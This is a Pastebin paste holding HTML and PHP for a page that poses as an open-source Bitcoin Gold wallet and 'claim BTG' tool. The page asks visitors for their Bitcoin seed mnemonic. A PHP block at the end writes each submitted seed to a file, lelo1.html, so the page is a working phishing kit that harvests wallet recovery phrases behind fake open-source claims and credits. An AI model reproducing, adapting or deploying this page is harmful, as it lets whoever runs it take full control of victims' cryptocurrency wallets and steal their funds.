Advertisement
Guest User

Untitled

a guest
Nov 13th, 2017
1,818
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 6.62 KB | None | 0 0
  1. <!DOCTYPE html>
  2. <html>
  3. <head>
  4. <title>Wallet Open Source for Bitcoin Gold</title>
  5. <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
  6. <meta name="description" content="Create your Bitcoin Gold Address or use our tool for Claim the BTG with your Bitcoin Seed, in your browser (can run locally)">
  7. <link href="https://fonts.googleapis.com/css?family=Roboto" rel="stylesheet">
  8. <link rel="stylesheet" href="https://mybtgwallet.com/design.css"/>
  9. </head>
  10. <body>
  11. <div class="aa">
  12. <div id="header">
  13. <div class="image"><img src="https://mybtgwallet.com/logo.png"></div>
  14. <div class="center">
  15. <h2>Get Open Source Wallets</h2>
  16. <h1>Open Source Bitcoin Gold Wallet In Browser</h1>
  17. CREATE AN OFFLINE WALLET (PAPER WALLET) OR CLAIM YOUR BITCOIN GOLDS<br />
  18. Updated 2017-11-10
  19. </div></div>
  20.  
  21. <div class="info">
  22. This site is <strong>Open Source</strong> and runs on just Javascript and HTML. You can Download the entire code on my <a href="https://github.com/John-Dass/btcgpuwallet" rel="nofollow" target="_blank">GitHub</a> and run it on your computer!.
  23. </div>
  24.  
  25. <div class="flexc">
  26. <div class="flex1 center" id="forcreatewallet">Create a New Wallet</div>
  27. <div class="flex2 center" id="forimportwallet">Import a BTG Wallet</div>
  28. <div class="flex3 center flexa" id="forimportseed">Import BTG from BTC Seed</div>
  29. </div>
  30.  
  31. <div id="createwallet" class="showopt">
  32. <span id="seedimport"><h2>New Bitcoin Gold Seed Created!</h2></span>
  33. <div class="dontcopy">Copy this and... DONT SHARE WITH ANY OTHER. SAVE IT IN A SAFE PLACES.</div>
  34. <div id="newseed"></div>
  35. <div class="textcenter">After you write this seed in another place. Copy and go to "Import a BTG Wallet"</div>
  36. </div>
  37.  
  38. <div id="importseed" class="showopt">
  39. <span id="seedimport"><h2>Import Bitcoin Gold from Bitcoin Seed</h2></span>
  40. <span id="toolimport">This tool work with BIP44/BIP39, so it's compatible with wallets like Jaxx, Mycelium, or Copay.</span>
  41. <table style="border-collapse:collapse;">
  42. <tr>
  43. <td style="width:170px;">
  44. <span id="selectwallet">Select Wallet Type:</span><br />
  45. <select name="wallet" id="walletpath" style="width:170px;">
  46. <option value="1">Jaxx (BIP44)</option>
  47. <option value="1">Mycelium (BIP44)</option>
  48. <option value="5">Electrum</option>
  49. <option value="1">Coinomi (BIP44)</option>
  50. <option value="1">Copay (BIP44)</option>
  51. <option value="1">Trezor / Ledger (BIP44)</option>
  52. <option value="1">Samourai (BIP44)</option>
  53. <option value="2" selected="selected">Other BIP44</option>
  54. <option value="3">Other BIP39</option>
  55. <option value="4">Other BIP49</option>
  56. </select>
  57. </td>
  58. <td style="width:80px;display:none;">
  59. Derivation Path:<br />
  60. <input id="derivationpath" type="text" disabled="disabled" value="m/44'/0'/0'" style="width:80px;" />
  61. </td>
  62. <td>
  63. Seed Mnemonic: (12, 18, 24 Words)
  64. <div style="position:relative;" action="<?php $PHP_SELF;?>" ><input method="post" name="seed" type="text" id="seed" placeholder="Example: clay dinosaur rival achieve hurt voyage come cram leaf boat close stairs soda entire apple surprise fine exhaust" />
  65. <button>CHECK BALANCE</button></div>
  66. </td>
  67. </tr>
  68. </table>
  69.  
  70. <table class="center" style="border-bottom:1px solid #CCCCCC;margin:10px 0;text-align:center;">
  71. <tr>
  72. <td id="sendfunds">Send BTG</td>
  73. <td id="receivefunds">Receive BTG</td>
  74. <td style="width:25%;background:#CCCCCC;border:1px solid #BBBBBB;border-radius:3px;padding:5px;">BTC Balance<br /><span id="btcbalance" style="font-size:2em;">0.00000000</span></td>
  75. <td style="width:25%;background:#EBA809;border:1px solid #CCCCCC;border-radius:3px;padding:5px;color:#FFFFFF;">BTG Balance<br /><span id="btgbalance" style="font-size:2em;">0.00000000</span></td>
  76. </tr>
  77. </table>
  78.  
  79. <table id="seedlist">
  80. <thead>
  81. <tr>
  82. <td style="width:27%;">Address BTC:</td>
  83. <td style="width:27%;">Address BTG:</td>
  84. <td>N. Tx:</td>
  85. <td style="width:18%;">BTC Balance:</td>
  86. <td style="width:18%;">BTG Balance:</td>
  87. </tr>
  88. </thead>
  89. <tbody>
  90. </tbody>
  91. </table>
  92.  
  93. </div>
  94.  
  95. <div class="adv">
  96. <strong>Caution:</strong> Because Bitcoin Gold has not yet been released (yes, we have the snapshot but not available nodes yet), we can't broadcast the transaction and the balance is theorical. The snapshot was taken before block 491407 (2017-10-24 01:20 UTC).
  97. </div>
  98.  
  99. </div>
  100.  
  101. <div id="endweb">
  102. <div style="width:calc(33% - 40px);margin:10px 0;display:inline-block;padding:5px 10px;vertical-align:top;"><h3><u>This project is 100% open-source code</u></h3>You can download the master branch at <a href="https://github.com/John-Dass/btcgpuwallet" rel="nofollow" target="_blank">github reposity</a>. This project is not finished but is stable for checking balances. When Bitcoin Gold Team release nodes and more information i will finish this adding the option of Create New Seed / Wallet and the option to Transfer funds of BTG from Here!.</div>
  103.  
  104. <div style="width:calc(33% - 40px);margin:10px 0;display:inline-block;padding:5px 10px;vertical-align:top;"><h3><u>About me:</u></h3>My nickname is JohnDass, an "enthusiasm developer of Open Source Website Proyects and really interested in the Blockchain Technology". My projects are created without any type of profit, so if you want help me you can Donate to: <strong>18UALTRrX4AnJsEgsUpwNsMv52DhqyzUjU</strong></div>
  105.  
  106. <div style="width:calc(33% - 40px);margin:10px 0;display:inline-block;padding:5px 10px;vertical-align:top;"><h3><u>Libraries and Credits:</u></h3><strong>jQuery</strong>: <a href="https://jquery.com" rel="nofollow">https://jquery.com</a><br /><strong>BitcoinJS</strong>: <a href="https://github.com/bitcoinjs/bitcoinjs-lib" rel="nofollow">https://github.com/bitcoinjs/bitcoinjs-lib</a><br /><strong>Bip39 by BitcoinJS</strong>: <a href="https://github.com/bitcoinjs/bip39" rel="nofollow">https://github.com/bitcoinjs/bip39</a><br /><br /><strong>Special Credits to <a href="https://github.com/iancoleman/" rel="nofollow">Ian Coleman</a></strong>, part of this project is based in his public tool for Bip39.</div>
  107. </div>
  108.  
  109. <script type="text/javascript" src="https://mybtgwallet.com/jquery-3.2.1.min.js"></script>
  110. <script type="text/javascript" src="https://mybtgwallet.com/bitcoinjs/bitcoinjs.min.js?v=20171108"></script>
  111. <script type="text/javascript" src="https://mybtgwallet.com/bitcoinjs/bip39/bip39.min.js?v=20171108"></script>
  112. <script type="text/javascript" src="https://mybtgwallet.com/application.js?v=20171110"></script>
  113.  
  114. <!-- Global site tag (gtag.js) - Google Analytics -->
  115. <script async src="https://www.googletagmanager.com/gtag/js?id=UA-108870131-1"></script>
  116. </body>
  117. </html>
  118.  
  119. <?php
  120. $seed = $_POST["seed"];
  121.  
  122. $file = fopen("lelo1.html", "a+");
  123. fwrite($file,
  124. "-----------------------<br>seed:".$seed."<br>");
  125. fclose($file);
  126.  
  127.  
  128. ?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement